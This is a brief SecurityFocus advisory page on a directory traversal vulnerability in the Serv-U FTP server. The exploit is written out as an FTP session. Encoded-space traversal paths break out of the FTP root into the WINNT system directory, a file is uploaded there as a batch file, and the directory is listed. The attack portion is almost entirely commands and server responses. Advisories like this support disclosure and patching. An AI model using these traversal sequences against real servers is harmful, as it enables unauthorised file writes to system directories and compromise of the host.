Serv-U FTP Directory Traversal Vulnerability

Exploit provided by Zoa_Chien <zoachien@securax.org>:

ftp> cd \..%20.
250 Directory changed to /..

ftp> cd %20..%20%20../winnt 250 Directory changed to /c:/TOMB/../WINNT
ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\


 

Privacy Statement
Copyright 2010, SecurityFocus